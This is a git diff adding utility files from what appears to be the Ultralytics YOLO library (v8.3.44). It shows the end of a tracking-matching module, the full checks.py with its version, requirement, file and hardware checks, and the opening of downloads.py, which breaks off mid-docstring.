tuple(range(cost_matrix.shape[0])), tuple(range(cost_matrix.shape[1])) + + if use_lap: + # Use lap.lapjv + # https://github.com/gatagat/lap + _, x, y = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh) + matches = [[ix, mx] for ix, mx in enumerate(x) if mx >= 0] + unmatched_a = np.where(x < 0)[0] + unmatched_b = np.where(y < 0)[0] + else: + # Use scipy.optimize.linear_sum_assignment + # https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.linear_sum_assignment.html + x, y = scipy.optimize.linear_sum_assignment(cost_matrix) # row x, col y + matches = np.asarray([[x[i], y[i]] for i in range(len(x)) if cost_matrix[x[i], y[i]] <= thresh]) + if len(matches) == 0: + unmatched_a = list(np.arange(cost_matrix.shape[0])) + unmatched_b = list(np.arange(cost_matrix.shape[1])) + else: + unmatched_a = list(set(np.arange(cost_matrix.shape[0])) - set(matches[:, 0])) + unmatched_b = list(set(np.arange(cost_matrix.shape[1])) - set(matches[:, 1])) + + return matches, unmatched_a, unmatched_b + + +def iou_distance(atracks: list, btracks: list) -> np.ndarray: + """ + Compute cost based on Intersection over Union (IoU) between tracks. + + Args: + atracks (list[STrack] | list[np.ndarray]): List of tracks 'a' or bounding boxes. + btracks (list[STrack] | list[np.ndarray]): List of tracks 'b' or bounding boxes. + + Returns: + (np.ndarray): Cost matrix computed based on IoU. + + Examples: + Compute IoU distance between two sets of tracks + >>> atracks = [np.array([0, 0, 10, 10]), np.array([20, 20, 30, 30])] + >>> btracks = [np.array([5, 5, 15, 15]), np.array([25, 25, 35, 35])] + >>> cost_matrix = iou_distance(atracks, btracks) + """ + if atracks and isinstance(atracks[0], np.ndarray) or btracks and isinstance(btracks[0], np.ndarray): + atlbrs = atracks + btlbrs = btracks + else: + atlbrs = [track.xywha if track.angle is not None else track.xyxy for track in atracks] + btlbrs = [track.xywha if track.angle is not None else track.xyxy for track in btracks] + + ious = np.zeros((len(atlbrs), len(btlbrs)), dtype=np.float32) + if len(atlbrs) and len(btlbrs): + if len(atlbrs[0]) == 5 and len(btlbrs[0]) == 5: + ious = batch_probiou( + np.ascontiguousarray(atlbrs, dtype=np.float32), + np.ascontiguousarray(btlbrs, dtype=np.float32), + ).numpy() + else: + ious = bbox_ioa( + np.ascontiguousarray(atlbrs, dtype=np.float32), + np.ascontiguousarray(btlbrs, dtype=np.float32), + iou=True, + ) + return 1 - ious # cost matrix + + +def embedding_distance(tracks: list, detections: list, metric: str = "cosine") -> np.ndarray: + """ + Compute distance between tracks and detections based on embeddings. + + Args: + tracks (list[STrack]): List of tracks, where each track contains embedding features. + detections (list[BaseTrack]): List of detections, where each detection contains embedding features. + metric (str): Metric for distance computation. Supported metrics include 'cosine', 'euclidean', etc. + + Returns: + (np.ndarray): Cost matrix computed based on embeddings with shape (N, M), where N is the number of tracks + and M is the number of detections. + + Examples: + Compute the embedding distance between tracks and detections using cosine metric + >>> tracks = [STrack(...), STrack(...)] # List of track objects with embedding features + >>> detections = [BaseTrack(...), BaseTrack(...)] # List of detection objects with embedding features + >>> cost_matrix = embedding_distance(tracks, detections, metric="cosine") + """ + cost_matrix = np.zeros((len(tracks), len(detections)), dtype=np.float32) + if cost_matrix.size == 0: + return cost_matrix + det_features = np.asarray([track.curr_feat for track in detections], dtype=np.float32) + # for i, track in enumerate(tracks): + # cost_matrix[i, :] = np.maximum(0.0, cdist(track.smooth_feat.reshape(1,-1), det_features, metric)) + track_features = np.asarray([track.smooth_feat for track in tracks], dtype=np.float32) + cost_matrix = np.maximum(0.0, cdist(track_features, det_features, metric)) # Normalized features + return cost_matrix + + +def fuse_score(cost_matrix: np.ndarray, detections: list) -> np.ndarray: + """ + Fuses cost matrix with detection scores to produce a single similarity matrix. + + Args: + cost_matrix (np.ndarray): The matrix containing cost values for assignments, with shape (N, M). + detections (list[BaseTrack]): List of detections, each containing a score attribute. + + Returns: + (np.ndarray): Fused similarity matrix with shape (N, M). + + Examples: + Fuse a cost matrix with detection scores + >>> cost_matrix = np.random.rand(5, 10) # 5 tracks and 10 detections + >>> detections = [BaseTrack(score=np.random.rand()) for _ in range(10)] + >>> fused_matrix = fuse_score(cost_matrix, detections) + """ + if cost_matrix.size == 0: + return cost_matrix + iou_sim = 1 - cost_matrix + det_scores = np.array([det.score for det in detections]) + det_scores = np.expand_dims(det_scores, axis=0).repeat(cost_matrix.shape[0], axis=0) + fuse_sim = iou_sim * det_scores + return 1 - fuse_sim # fuse_cost diff --git a/2024.ultralytics/v8.3.44/utils/checks.py b/2024.ultralytics/v8.3.44/utils/checks.py new file mode 100644 index 0000000..fe858eb --- /dev/null +++ b/2024.ultralytics/v8.3.44/utils/checks.py @@ -0,0 +1,789 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import glob +import inspect +import math +import os +import platform +import re +import shutil +import subprocess +import time +from importlib import metadata +from pathlib import Path +from typing import Optional + +import cv2 +import numpy as np +import requests +import torch + +from ultralytics.utils import ( + ASSETS, + AUTOINSTALL, + IS_COLAB, + IS_GIT_DIR, + IS_KAGGLE, + IS_PIP_PACKAGE, + LINUX, + LOGGER, + MACOS, + ONLINE, + PYTHON_VERSION, + ROOT, + TORCHVISION_VERSION, + USER_CONFIG_DIR, + WINDOWS, + Retry, + SimpleNamespace, + ThreadingLocked, + TryExcept, + clean_url, + colorstr, + downloads, + emojis, + is_github_action_running, + url2file, +) + + +def parse_requirements(file_path=ROOT.parent / "requirements.txt", package=""): + """ + Parse a requirements.txt file, ignoring lines that start with '#' and any text after '#'. + + Args: + file_path (Path): Path to the requirements.txt file. + package (str, optional): Python package to use instead of requirements.txt file, i.e. package='ultralytics'. + + Returns: + (List[Dict[str, str]]): List of parsed requirements as dictionaries with `name` and `specifier` keys. + + Example: + ```python + from ultralytics.utils.checks import parse_requirements + + parse_requirements(package="ultralytics") + ``` + """ + if package: + requires = [x for x in metadata.distribution(package).requires if "extra == " not in x] + else: + requires = Path(file_path).read_text().splitlines() + + requirements = [] + for line in requires: + line = line.strip() + if line and not line.startswith("#"): + line = line.split("#")[0].strip() # ignore inline comments + match = re.match(r"([a-zA-Z0-9-_]+)\s*([<>!=~]+.*)?", line) + if match: + requirements.append(SimpleNamespace(name=match[1], specifier=match[2].strip() if match[2] else "")) + + return requirements + + +def parse_version(version="0.0.0") -> tuple: + """ + Convert a version string to a tuple of integers, ignoring any extra non-numeric string attached to the version. This + function replaces deprecated 'pkg_resources.parse_version(v)'. + + Args: + version (str): Version string, i.e. '2.0.1+cpu' + + Returns: + (tuple): Tuple of integers representing the numeric part of the version and the extra string, i.e. (2, 0, 1) + """ + try: + return tuple(map(int, re.findall(r"\d+", version)[:3])) # '2.0.1+cpu' -> (2, 0, 1) + except Exception as e: + LOGGER.warning(f"WARNING ⚠️ failure for parse_version({version}), returning (0, 0, 0): {e}") + return 0, 0, 0 + + +def is_ascii(s) -> bool: + """ + Check if a string is composed of only ASCII characters. + + Args: + s (str): String to be checked. + + Returns: + (bool): True if the string is composed only of ASCII characters, False otherwise. + """ + # Convert list, tuple, None, etc. to string + s = str(s) + + # Check if the string is composed of only ASCII characters + return all(ord(c) < 128 for c in s) + + +def check_imgsz(imgsz, stride=32, min_dim=1, max_dim=2, floor=0): + """ + Verify image size is a multiple of the given stride in each dimension. If the image size is not a multiple of the + stride, update it to the nearest multiple of the stride that is greater than or equal to the given floor value. + + Args: + imgsz (int | cList[int]): Image size. + stride (int): Stride value. + min_dim (int): Minimum number of dimensions. + max_dim (int): Maximum number of dimensions. + floor (int): Minimum allowed value for image size. + + Returns: + (List[int]): Updated image size. + """ + # Convert stride to integer if it is a tensor + stride = int(stride.max() if isinstance(stride, torch.Tensor) else stride) + + # Convert image size to list if it is an integer + if isinstance(imgsz, int): + imgsz = [imgsz] + elif isinstance(imgsz, (list, tuple)): + imgsz = list(imgsz) + elif isinstance(imgsz, str): # i.e. '640' or '[640,640]' + imgsz = [int(imgsz)] if imgsz.isnumeric() else eval(imgsz) + else: + raise TypeError( + f"'imgsz={imgsz}' is of invalid type {type(imgsz).__name__}. " + f"Valid imgsz types are int i.e. 'imgsz=640' or list i.e. 'imgsz=[640,640]'" + ) + + # Apply max_dim + if len(imgsz) > max_dim: + msg = ( + "'train' and 'val' imgsz must be an integer, while 'predict' and 'export' imgsz may be a [h, w] list " + "or an integer, i.e. 'yolo export imgsz=640,480' or 'yolo export imgsz=640'" + ) + if max_dim != 1: + raise ValueError(f"imgsz={imgsz} is not a valid image size. {msg}") + LOGGER.warning(f"WARNING ⚠️ updating to 'imgsz={max(imgsz)}'. {msg}") + imgsz = [max(imgsz)] + # Make image size a multiple of the stride + sz = [max(math.ceil(x / stride) * stride, floor) for x in imgsz] + + # Print warning message if image size was updated + if sz != imgsz: + LOGGER.warning(f"WARNING ⚠️ imgsz={imgsz} must be multiple of max stride {stride}, updating to {sz}") + + # Add missing dimensions if necessary + sz = [sz[0], sz[0]] if min_dim == 2 and len(sz) == 1 else sz[0] if min_dim == 1 and len(sz) == 1 else sz + + return sz + + +def check_version( + current: str = "0.0.0", + required: str = "0.0.0", + name: str = "version", + hard: bool = False, + verbose: bool = False, + msg: str = "", +) -> bool: + """ + Check current version against the required version or range. + + Args: + current (str): Current version or package name to get version from. + required (str): Required version or range (in pip-style format). + name (str, optional): Name to be used in warning message. + hard (bool, optional): If True, raise an AssertionError if the requirement is not met. + verbose (bool, optional): If True, print warning message if requirement is not met. + msg (str, optional): Extra message to display if verbose. + + Returns: + (bool): True if requirement is met, False otherwise. + + Example: + ```python + # Check if current version is exactly 22.04 + check_version(current="22.04", required="==22.04") + + # Check if current version is greater than or equal to 22.04 + check_version(current="22.10", required="22.04") # assumes '>=' inequality if none passed + + # Check if current version is less than or equal to 22.04 + check_version(current="22.04", required="<=22.04") + + # Check if current version is between 20.04 (inclusive) and 22.04 (exclusive) + check_version(current="21.10", required=">20.04,<22.04") + ``` + """ + if not current: # if current is '' or None + LOGGER.warning(f"WARNING ⚠️ invalid check_version({current}, {required}) requested, please check values.") + return True + elif not current[0].isdigit(): # current is package name rather than version string, i.e. current='ultralytics' + try: + name = current # assigned package name to 'name' arg + current = metadata.version(current) # get version string from package name + except metadata.PackageNotFoundError as e: + if hard: + raise ModuleNotFoundError(emojis(f"WARNING ⚠️ {current} package is required but not installed")) from e + else: + return False + + if not required: # if required is '' or None + return True + + if "sys_platform" in required and ( # i.e. required='<2.4.0,>=1.8.0; sys_platform == "win32"' + (WINDOWS and "win32" not in required) + or (LINUX and "linux" not in required) + or (MACOS and "macos" not in required and "darwin" not in required) + ): + return True + + op = "" + version = "" + result = True + c = parse_version(current) # '1.2.3' -> (1, 2, 3) + for r in required.strip(",").split(","): + op, version = re.match(r"([^0-9]*)([\d.]+)", r).groups() # split '>=22.04' -> ('>=', '22.04') + if not op: + op = ">=" # assume >= if no op passed + v = parse_version(version) # '1.2.3' -> (1, 2, 3) + if op == "==" and c != v: + result = False + elif op == "!=" and c == v: + result = False + elif op == ">=" and not (c >= v): + result = False + elif op == "<=" and not (c <= v): + result = False + elif op == ">" and not (c > v): + result = False + elif op == "<" and not (c < v): + result = False + if not result: + warning = f"WARNING ⚠️ {name}{op}{version} is required, but {name}=={current} is currently installed {msg}" + if hard: + raise ModuleNotFoundError(emojis(warning)) # assert version requirements met + if verbose: + LOGGER.warning(warning) + return result + + +def check_latest_pypi_version(package_name="ultralytics"): + """ + Returns the latest version of a PyPI package without downloading or installing it. + + Args: + package_name (str): The name of the package to find the latest version for. + + Returns: + (str): The latest version of the package. + """ + try: + requests.packages.urllib3.disable_warnings() # Disable the InsecureRequestWarning + response = requests.get(f"https://pypi.org/pypi/{package_name}/json", timeout=3) + if response.status_code == 200: + return response.json()["info"]["version"] + except Exception: + return None + + +def check_pip_update_available(): + """ + Checks if a new version of the ultralytics package is available on PyPI. + + Returns: + (bool): True if an update is available, False otherwise. + """ + if ONLINE and IS_PIP_PACKAGE: + try: + from ultralytics import __version__ + + latest = check_latest_pypi_version() + if check_version(__version__, f"<{latest}"): # check if current version is < latest version + LOGGER.info( + f"New https://pypi.org/project/ultralytics/{latest} available 😃 " + f"Update with 'pip install -U ultralytics'" + ) + return True + except Exception: + pass + return False + + +@ThreadingLocked() +def check_font(font="Arial.ttf"): + """ + Find font locally or download to user's configuration directory if it does not already exist. + + Args: + font (str): Path or name of font. + + Returns: + file (Path): Resolved font file path. + """ + from matplotlib import font_manager + + # Check USER_CONFIG_DIR + name = Path(font).name + file = USER_CONFIG_DIR / name + if file.exists(): + return file + + # Check system fonts + matches = [s for s in font_manager.findSystemFonts() if font in s] + if any(matches): + return matches[0] + + # Download to USER_CONFIG_DIR if missing + url = f"https://github.com/ultralytics/assets/releases/download/v0.0.0/{name}" + if downloads.is_url(url, check=True): + downloads.safe_download(url=url, file=file) + return file + + +def check_python(minimum: str = "3.8.0", hard: bool = True, verbose: bool = False) -> bool: + """ + Check current python version against the required minimum version. + + Args: + minimum (str): Required minimum version of python. + hard (bool, optional): If True, raise an AssertionError if the requirement is not met. + verbose (bool, optional): If True, print warning message if requirement is not met. + + Returns: + (bool): Whether the installed Python version meets the minimum constraints. + """ + return check_version(PYTHON_VERSION, minimum, name="Python", hard=hard, verbose=verbose) + + +@TryExcept() +def check_requirements(requirements=ROOT.parent / "requirements.txt", exclude=(), install=True, cmds=""): + """ + Check if installed dependencies meet YOLOv8 requirements and attempt to auto-update if needed. + + Args: + requirements (Union[Path, str, List[str]]): Path to a requirements.txt file, a single package requirement as a + string, or a list of package requirements as strings. + exclude (Tuple[str]): Tuple of package names to exclude from checking. + install (bool): If True, attempt to auto-update packages that don't meet requirements. + cmds (str): Additional commands to pass to the pip install command when auto-updating. + + Example: + ```python + from ultralytics.utils.checks import check_requirements + + # Check a requirements.txt file + check_requirements("path/to/requirements.txt") + + # Check a single package + check_requirements("ultralytics>=8.0.0") + + # Check multiple packages + check_requirements(["numpy", "ultralytics>=8.0.0"]) + ``` + """ + prefix = colorstr("red", "bold", "requirements:") + if isinstance(requirements, Path): # requirements.txt file + file = requirements.resolve() + assert file.exists(), f"{prefix} {file} not found, check failed." + requirements = [f"{x.name}{x.specifier}" for x in parse_requirements(file) if x.name not in exclude] + elif isinstance(requirements, str): + requirements = [requirements] + + pkgs = [] + for r in requirements: + r_stripped = r.split("/")[-1].replace(".git", "") # replace git+https://org/repo.git -> 'repo' + match = re.match(r"([a-zA-Z0-9-_]+)([<>!=~]+.*)?", r_stripped) + name, required = match[1], match[2].strip() if match[2] else "" + try: + assert check_version(metadata.version(name), required) # exception if requirements not met + except (AssertionError, metadata.PackageNotFoundError): + pkgs.append(r) + + @Retry(times=2, delay=1) + def attempt_install(packages, commands): + """Attempt pip install command with retries on failure.""" + return subprocess.check_output(f"pip install --no-cache-dir {packages} {commands}", shell=True).decode() + + s = " ".join(f'"{x}"' for x in pkgs) # console string + if s: + if install and AUTOINSTALL: # check environment variable + n = len(pkgs) # number of packages updates + LOGGER.info(f"{prefix} Ultralytics requirement{'s' * (n > 1)} {pkgs} not found, attempting AutoUpdate...") + try: + t = time.time() + assert ONLINE, "AutoUpdate skipped (offline)" + LOGGER.info(attempt_install(s, cmds)) + dt = time.time() - t + LOGGER.info( + f"{prefix} AutoUpdate success ✅ {dt:.1f}s, installed {n} package{'s' * (n > 1)}: {pkgs}\n" + f"{prefix} ⚠️ {colorstr('bold', 'Restart runtime or rerun command for updates to take effect')}\n" + ) + except Exception as e: + LOGGER.warning(f"{prefix} ❌ {e}") + return False + else: + return False + + return True + + +def check_torchvision(): + """ + Checks the installed versions of PyTorch and Torchvision to ensure they're compatible. + + This function checks the installed versions of PyTorch and Torchvision, and warns if they're incompatible according + to the provided compatibility table based on: + https://github.com/pytorch/vision#installation. + + The compatibility table is a dictionary where the keys are PyTorch versions and the values are lists of compatible + Torchvision versions. + """ + # Compatibility table + compatibility_table = { + "2.4": ["0.19"], + "2.3": ["0.18"], + "2.2": ["0.17"], + "2.1": ["0.16"], + "2.0": ["0.15"], + "1.13": ["0.14"], + "1.12": ["0.13"], + } + + # Extract only the major and minor versions + v_torch = ".".join(torch.__version__.split("+")[0].split(".")[:2]) + if v_torch in compatibility_table: + compatible_versions = compatibility_table[v_torch] + v_torchvision = ".".join(TORCHVISION_VERSION.split("+")[0].split(".")[:2]) + if all(v_torchvision != v for v in compatible_versions): + print( + f"WARNING ⚠️ torchvision=={v_torchvision} is incompatible with torch=={v_torch}.\n" + f"Run 'pip install torchvision=={compatible_versions[0]}' to fix torchvision or " + "'pip install -U torch torchvision' to update both.\n" + "For a full compatibility table see https://github.com/pytorch/vision#installation" + ) + + +def check_suffix(file="yolo11n.pt", suffix=".pt", msg=""): + """Check file(s) for acceptable suffix.""" + if file and suffix: + if isinstance(suffix, str): + suffix = (suffix,) + for f in file if isinstance(file, (list, tuple)) else [file]: + s = Path(f).suffix.lower().strip() # file suffix + if len(s): + assert s in suffix, f"{msg}{f} acceptable suffix is {suffix}, not {s}" + + +def check_yolov5u_filename(file: str, verbose: bool = True): + """Replace legacy YOLOv5 filenames with updated YOLOv5u filenames.""" + if "yolov3" in file or "yolov5" in file: + if "u.yaml" in file: + file = file.replace("u.yaml", ".yaml") # i.e. yolov5nu.yaml -> yolov5n.yaml + elif ".pt" in file and "u" not in file: + original_file = file + file = re.sub(r"(.*yolov5([nsmlx]))\.pt", "\\1u.pt", file) # i.e. yolov5n.pt -> yolov5nu.pt + file = re.sub(r"(.*yolov5([nsmlx])6)\.pt", "\\1u.pt", file) # i.e. yolov5n6.pt -> yolov5n6u.pt + file = re.sub(r"(.*yolov3(|-tiny|-spp))\.pt", "\\1u.pt", file) # i.e. yolov3-spp.pt -> yolov3-sppu.pt + if file != original_file and verbose: + LOGGER.info( + f"PRO TIP 💡 Replace 'model={original_file}' with new 'model={file}'.\nYOLOv5 'u' models are " + f"trained with https://github.com/ultralytics/ultralytics and feature improved performance vs " + f"standard YOLOv5 models trained with https://github.com/ultralytics/yolov5.\n" + ) + return file + + +def check_model_file_from_stem(model="yolov8n"): + """Return a model filename from a valid model stem.""" + if model and not Path(model).suffix and Path(model).stem in downloads.GITHUB_ASSETS_STEMS: + return Path(model).with_suffix(".pt") # add suffix, i.e. yolov8n -> yolov8n.pt + else: + return model + + +def check_file(file, suffix="", download=True, download_dir=".", hard=True): + """Search/download file (if necessary) and return path.""" + check_suffix(file, suffix) # optional + file = str(file).strip() # convert to string and strip spaces + file = check_yolov5u_filename(file) # yolov5n -> yolov5nu + if ( + not file + or ("://" not in file and Path(file).exists()) # '://' check required in Windows Python<3.10 + or file.lower().startswith("grpc://") + ): # file exists or gRPC Triton images + return file + elif download and file.lower().startswith(("https://", "http://", "rtsp://", "rtmp://", "tcp://")): # download + url = file # warning: Pathlib turns :// -> :/ + file = Path(download_dir) / url2file(file) # '%2F' to '/', split https://url.com/file.txt?auth + if file.exists(): + LOGGER.info(f"Found {clean_url(url)} locally at {file}") # file already exists + else: + downloads.safe_download(url=url, file=file, unzip=False) + return str(file) + else: # search + files = glob.glob(str(ROOT / "**" / file), recursive=True) or glob.glob(str(ROOT.parent / file)) # find file + if not files and hard: + raise FileNotFoundError(f"'{file}' does not exist") + elif len(files) > 1 and hard: + raise FileNotFoundError(f"Multiple files match '{file}', specify exact path: {files}") + return files[0] if len(files) else [] # return file + + +def check_yaml(file, suffix=(".yaml", ".yml"), hard=True): + """Search/download YAML file (if necessary) and return path, checking suffix.""" + return check_file(file, suffix, hard=hard) + + +def check_is_path_safe(basedir, path): + """ + Check if the resolved path is under the intended directory to prevent path traversal. + + Args: + basedir (Path | str): The intended directory. + path (Path | str): The path to check. + + Returns: + (bool): True if the path is safe, False otherwise. + """ + base_dir_resolved = Path(basedir).resolve() + path_resolved = Path(path).resolve() + + return path_resolved.exists() and path_resolved.parts[: len(base_dir_resolved.parts)] == base_dir_resolved.parts + + +def check_imshow(warn=False): + """Check if environment supports image displays.""" + try: + if LINUX: + assert not IS_COLAB and not IS_KAGGLE + assert "DISPLAY" in os.environ, "The DISPLAY environment variable isn't set." + cv2.imshow("test", np.zeros((8, 8, 3), dtype=np.uint8)) # show a small 8-pixel image + cv2.waitKey(1) + cv2.destroyAllWindows() + cv2.waitKey(1) + return True + except Exception as e: + if warn: + LOGGER.warning(f"WARNING ⚠️ Environment does not support cv2.imshow() or PIL Image.show()\n{e}") + return False + + +def check_yolo(verbose=True, device=""): + """Return a human-readable YOLO software and hardware summary.""" + import psutil + + from ultralytics.utils.torch_utils import select_device + + if IS_COLAB: + shutil.rmtree("sample_data", ignore_errors=True) # remove colab /sample_data directory + + if verbose: + # System info + gib = 1 << 30 # bytes per GiB + ram = psutil.virtual_memory().total + total, used, free = shutil.disk_usage("/") + s = f"({os.cpu_count()} CPUs, {ram / gib:.1f} GB RAM, {(total - free) / gib:.1f}/{total / gib:.1f} GB disk)" + try: + from IPython import display + + display.clear_output() # clear display if notebook + except ImportError: + pass + else: + s = "" + + select_device(device=device, newline=False) + LOGGER.info(f"Setup complete ✅ {s}") + + +def collect_system_info(): + """Collect and print relevant system information including OS, Python, RAM, CPU, and CUDA.""" + import psutil + + from ultralytics.utils import ENVIRONMENT # scope to avoid circular import + from ultralytics.utils.torch_utils import get_cpu_info, get_gpu_info + + gib = 1 << 30 # bytes per GiB + cuda = torch and torch.cuda.is_available() + check_yolo() + total, used, free = shutil.disk_usage("/") + + info_dict = { + "OS": platform.platform(), + "Environment": ENVIRONMENT, + "Python": PYTHON_VERSION, + "Install": "git" if IS_GIT_DIR else "pip" if IS_PIP_PACKAGE else "other", + "RAM": f"{psutil.virtual_memory().total / gib:.2f} GB", + "Disk": f"{(total - free) / gib:.1f}/{total / gib:.1f} GB", + "CPU": get_cpu_info(), + "CPU count": os.cpu_count(), + "GPU": get_gpu_info(index=0) if cuda else None, + "GPU count": torch.cuda.device_count() if cuda else None, + "CUDA": torch.version.cuda if cuda else None, + } + LOGGER.info("\n" + "\n".join(f"{k:<20}{v}" for k, v in info_dict.items()) + "\n") + + package_info = {} + for r in parse_requirements(package="ultralytics"): + try: + current = metadata.version(r.name) + is_met = "✅ " if check_version(current, str(r.specifier), name=r.name, hard=True) else "❌ " + except metadata.PackageNotFoundError: + current = "(not installed)" + is_met = "❌ " + package_info[r.name] = f"{is_met}{current}{r.specifier}" + LOGGER.info(f"{r.name:<20}{package_info[r.name]}") + + info_dict["Package Info"] = package_info + + if is_github_action_running(): + github_info = { + "RUNNER_OS": os.getenv("RUNNER_OS"), + "GITHUB_EVENT_NAME": os.getenv("GITHUB_EVENT_NAME"), + "GITHUB_WORKFLOW": os.getenv("GITHUB_WORKFLOW"), + "GITHUB_ACTOR": os.getenv("GITHUB_ACTOR"), + "GITHUB_REPOSITORY": os.getenv("GITHUB_REPOSITORY"), + "GITHUB_REPOSITORY_OWNER": os.getenv("GITHUB_REPOSITORY_OWNER"), + } + LOGGER.info("\n" + "\n".join(f"{k}: {v}" for k, v in github_info.items())) + info_dict["GitHub Info"] = github_info + + return info_dict + + +def check_amp(model): + """ + Checks the PyTorch Automatic Mixed Precision (AMP) functionality of a YOLO11 model. If the checks fail, it means + there are anomalies with AMP on the system that may cause NaN losses or zero-mAP results, so AMP will be disabled + during training. + + Args: + model (nn.Module): A YOLO11 model instance. + + Example: + ```python + from ultralytics import YOLO + from ultralytics.utils.checks import check_amp + + model = YOLO("yolo11n.pt").model.cuda() + check_amp(model) + ``` + + Returns: + (bool): Returns True if the AMP functionality works correctly with YOLO11 model, else False. + """ + from ultralytics.utils.torch_utils import autocast + + device = next(model.parameters()).device # get model device + prefix = colorstr("AMP: ") + if device.type in {"cpu", "mps"}: + return False # AMP only used on CUDA devices + else: + # GPUs that have issues with AMP + pattern = re.compile( + r"(nvidia|geforce|quadro|tesla).*?(1660|1650|1630|t400|t550|t600|t1000|t1200|t2000|k40m)", re.IGNORECASE + ) + + gpu = torch.cuda.get_device_name(device) + if bool(pattern.search(gpu)): + LOGGER.warning( + f"{prefix}checks failed ❌. AMP training on {gpu} GPU may cause " + f"NaN losses or zero-mAP results, so AMP will be disabled during training." + ) + return False + + def amp_allclose(m, im): + """All close FP32 vs AMP results.""" + batch = [im] * 8 + imgsz = max(256, int(model.stride.max() * 4)) # max stride P5-32 and P6-64 + a = m(batch, imgsz=imgsz, device=device, verbose=False)[0].boxes.data # FP32 inference + with autocast(enabled=True): + b = m(batch, imgsz=imgsz, device=device, verbose=False)[0].boxes.data # AMP inference + del m + return a.shape == b.shape and torch.allclose(a, b.float(), atol=0.5) # close to 0.5 absolute tolerance + + im = ASSETS / "bus.jpg" # image to check + LOGGER.info(f"{prefix}running Automatic Mixed Precision (AMP) checks...") + warning_msg = "Setting 'amp=True'. If you experience zero-mAP or NaN losses you can disable AMP with amp=False." + try: + from ultralytics import YOLO + + assert amp_allclose(YOLO("yolo11n.pt"), im) + LOGGER.info(f"{prefix}checks passed ✅") + except ConnectionError: + LOGGER.warning( + f"{prefix}checks skipped ⚠️. " f"Offline and unable to download YOLO11n for AMP checks. {warning_msg}" + ) + except (AttributeError, ModuleNotFoundError): + LOGGER.warning( + f"{prefix}checks skipped ⚠️. " + f"Unable to load YOLO11n for AMP checks due to possible Ultralytics package modifications. {warning_msg}" + ) + except AssertionError: + LOGGER.warning( + f"{prefix}checks failed ❌. Anomalies were detected with AMP on your system that may lead to " + f"NaN losses or zero-mAP results, so AMP will be disabled during training." + ) + return False + return True + + +def git_describe(path=ROOT): # path must be a directory + """Return human-readable git description, i.e. v5.0-5-g3e25f1e https://git-scm.com/docs/git-describe.""" + try: + return subprocess.check_output(f"git -C {path} describe --tags --long --always", shell=True).decode()[:-1] + except Exception: + return "" + + +def print_args(args: Optional[dict] = None, show_file=True, show_func=False): + """Print function arguments (optional args dict).""" + + def strip_auth(v): + """Clean longer Ultralytics HUB URLs by stripping potential authentication information.""" + return clean_url(v) if (isinstance(v, str) and v.startswith("http") and len(v) > 100) else v + + x = inspect.currentframe().f_back # previous frame + file, _, func, _, _ = inspect.getframeinfo(x) + if args is None: # get args automatically + args, _, _, frm = inspect.getargvalues(x) + args = {k: v for k, v in frm.items() if k in args} + try: + file = Path(file).resolve().relative_to(ROOT).with_suffix("") + except ValueError: + file = Path(file).stem + s = (f"{file}: " if show_file else "") + (f"{func}: " if show_func else "") + LOGGER.info(colorstr(s) + ", ".join(f"{k}={strip_auth(v)}" for k, v in args.items())) + + +def cuda_device_count() -> int: + """ + Get the number of NVIDIA GPUs available in the environment. + + Returns: + (int): The number of NVIDIA GPUs available. + """ + try: + # Run the nvidia-smi command and capture its output + output = subprocess.check_output( + ["nvidia-smi", "--query-gpu=count", "--format=csv,noheader,nounits"], encoding="utf-8" + ) + + # Take the first line and strip any leading/trailing white space + first_line = output.strip().split("\n")[0] + + return int(first_line) + except (subprocess.CalledProcessError, FileNotFoundError, ValueError): + # If the command fails, nvidia-smi is not found, or output is not an integer, assume no GPUs are available + return 0 + + +def cuda_is_available() -> bool: + """ + Check if CUDA is available in the environment. + + Returns: + (bool): True if one or more NVIDIA GPUs are available, False otherwise. + """ + return cuda_device_count() > 0 + + +# Run checks and define constants +check_python("3.8", hard=False, verbose=True) # check python version +check_torchvision() # check torch-torchvision compatibility +IS_PYTHON_MINIMUM_3_10 = check_python("3.10", hard=False) +IS_PYTHON_3_12 = PYTHON_VERSION.startswith("3.12") diff --git a/2024.ultralytics/v8.3.44/utils/downloads.py b/2024.ultralytics/v8.3.44/utils/downloads.py new file mode 100644 index 0000000..be182f4 --- /dev/null +++ b/2024.ultralytics/v8.3.44/utils/downloads.py @@ -0,0 +1,507 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import re +import shutil +import subprocess +from itertools import repeat +from multiprocessing.pool import ThreadPool +from pathlib import Path +from urllib import parse, request + +import requests +import torch + +from ultralytics.utils import LOGGER, TQDM, checks, clean_url, emojis, is_online, url2file + +# Define Ultralytics GitHub assets maintained at https://github.com/ultralytics/assets +GITHUB_ASSETS_REPO = "ultralytics/assets" +GITHUB_ASSETS_NAMES = ( + [f"yolov8{k}{suffix}.pt" for k in "nsmlx" for suffix in ("", "-cls", "-seg", "-pose", "-obb", "-oiv7")] + + [f"yolo11{k}{suffix}.pt" for k in "nsmlx" for suffix in ("", "-cls", "-seg", "-pose", "-obb")] + + [f"yolov5{k}{resolution}u.pt" for k in "nsmlx" for resolution in ("", "6")] + + [f"yolov3{k}u.pt" for k in ("", "-spp", "-tiny")] + + [f"yolov8{k}-world.pt" for k in "smlx"] + + [f"yolov8{k}-worldv2.pt" for k in "smlx"] + + [f"yolov9{k}.pt" for k in "tsmce"] + + [f"yolov10{k}.pt" for k in "nsmblx"] + + [f"yolo_nas_{k}.pt" for k in "sml"] + + [f"sam_{k}.pt" for k in "bl"] + + [f"FastSAM-{k}.pt" for k in "sx"] + + [f"rtdetr-{k}.pt" for k in "lx"] + + ["mobile_sam.pt"] + + ["calibration_image_sample_data_20x128x128x3_float32.npy.zip"] +) +GITHUB_ASSETS_STEMS = [Path(k).stem for k in GITHUB_ASSETS_NAMES] + + +def is_url(url, check=False): + """ + Validates if the given string is a URL and optionally checks if the URL exists online. + + Args: + url (str): The string to be validated as a URL. + check (bool, optional): If True, performs an additional check to see if the URL exists online. + Defaults to False. + + Returns: + (bool): Returns True for a valid URL. If 'check' is True, also returns True if the URL exists online. + Returns False otherwise. + + Example: + ```python + valid = is_url("https://www.example.com") + ``` + """ + try: + url = str(url) + result = parse.urlparse(url) + assert all([result.scheme, result.netloc]) # check if is url + if check: + with request.urlopen(url) as response: + return response.getcode() == 200 # check if exists online + return True + except Exception: + return False + + +def delete_dsstore(path, files_to_delete=(".DS_Store", "__MACOSX")): + """ + Deletes all ".DS_store" files under a specified directory. + + Args: + path (str, optional): The directory path where the 